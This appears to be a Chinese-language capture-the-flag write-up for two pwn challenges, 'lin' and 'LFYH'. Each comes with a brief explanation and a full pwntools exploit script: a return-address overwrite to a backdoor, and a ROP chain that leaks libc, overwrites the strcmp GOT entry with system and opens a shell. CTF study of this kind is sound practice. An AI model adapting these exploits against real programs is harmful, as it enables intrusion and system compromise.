题目链接

lin

• 有个后门，有栈溢出，但是程序会检测返回地址，直接把返回地址改到这里绕过

exp :

from pwn import *

p = process('./lin')

payload = 'a'*0x20 + 'b'*8 + p64(0x400977)
gdb.attach(p,'b *0x400a96')
p.recvuntil('check?\n> ')
p.sendline(payload)

p.interactive()

LFYH

• 程序有个栈溢出，但是溢出返回地址后需要跳出循环才能rop，所以先利用溢出修改fd为0，然后我们就可以对buf进行改写，在第二次strcmp我们就可以构造rop链并且跳出循环执行rop

exp:

from pwn import *

context.log_level = 'debug'

p = process('./LFYH')
elf = ELF('./LFYH')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

payload = 'a'*0x78 + p64(0x0)
p.recvuntil('input: ')
p.sendline('a')
p.recvuntil('value: \n')
#gdb.attach(p,'b *0x400ecd')
#hijack fd-> 0
p.sendline(payload)
#change buf
p.recvuntil('target: ')
p.sendline(payload)
p.recvuntil('input: ')
p.sendline('a')
p.recvuntil('random value: \n')

#rop and leak libc , hijack got
puts_got = elf.got['puts']
strcmp_got = elf.got['strcmp']
read_got = elf.got['read']
offset_system = 0x0000000000045390
p6_ret = 0x40109A
mov_call = 0x401080
'''
rbx rbp r12 r13 r14 r15
0   1   got rdi rsi rdx
'''
payload = 'a'*0x78 + p64(0) + 'bbbbbbbb' 
payload += p64(p6_ret) + p64(0) + p64(1) + p64(puts_got)
payload += p64(puts_got) + p64(0) + p64(0) + p64(mov_call)
payload += 'a'*8 + p64(0) + p64(1) + p64(read_got)
payload += p64(0) + p64(strcmp_got) + p64(0x8) + p64(mov_call)
payload += 'a'*56 + p64(0x400D2A)
p.sendline(payload)
p.recvuntil('it?\n')
libc_base = u64(p.recv(6).ljust(8,'\x00')) - libc.symbols['puts']
system_addr = libc_base + libc.symbols['system']
log.success('libc_base addr : 0x%x'%libc_base)
log.success('system addr : 0x%x'%system_addr)

#hijack strcmp_got -> system
p.send(p64(system_addr))

#trigger system('/bin/sh\x00')
p.recvuntil('input: ')
p.sendline('a')
p.recvuntil('value: \n')
p.sendline('/bin/sh\x00')
p.interactive()